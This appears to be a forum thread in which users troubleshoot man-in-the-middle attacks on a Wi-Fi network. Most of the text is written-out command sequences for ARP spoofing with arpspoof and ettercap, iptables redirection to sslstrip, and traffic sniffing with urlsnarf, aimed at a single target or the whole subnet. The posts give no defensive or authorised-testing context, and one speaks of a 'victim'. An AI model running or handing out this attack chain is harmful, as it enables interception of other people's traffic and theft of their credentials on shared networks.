echemmon

Hi I was always able to do a mitm attack targetting a specific IP and using sslstrip, ettercap, arpspoof, ... But today I tried (for the first time) to do the whole network at once and it was like sslstrip wasn't doing anything. No errors whatsoever and yet all I could see was the usual "sslstrip 0.9 by Moxie Marlinspike" and then nothing. When I target one computer I usually do something like: echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sslstrip -a -k -f arpspoof -i wlan0 -t <targetIP> -r <gatewayIP> ettercap -Tq -L etterlogs -i wlan0 urlsnarf -v -i wlan0 and it works. To do the whole network I tried the same only replacing the <targetIP> by the Bcast (ie 192.168.1.255). I think one time it said "couldn't arp for ..." So then I tried method 2: echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 ettercap -T -q -i wlan0 -M ARP:REMOTE // // sslstrip -a -l 10000 urlsnarf -i wlan0 It ran I think but nothing happened and I couldn't see the traffic. What am I doing wrong? I'm not very experienced at this and if anyone knows a better way to do an sslstrip on the whole network I'd be grateful. I have the latest version of Kali btw. Cheers

All the IPs I typed in were fine (192.168.1.1 for gateway, the bcast ip 192.168.1.255 for targetting the network and 10000 for listen port). But nevermind it works again. Still weird, though - I'd honestly like to know what caused that.

Hello OK so when I do sslstrip and try to make it work with arpsoof the victim's internet stops working. Like the pages won't load. Anybody else ever had that issue? I did exactly: nmap -sn <gatewayIP>/24 echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port <listenPort> arpspoof -i <interface> -t <targetIP> -r <gatewayIP> sslstrip -l <listenPort> tail -f sslstrip.log and btw I used 8080 for listenPort but I don't think that matters. Anywho, if somebody knows what's the problem - any advice would be very appreciated.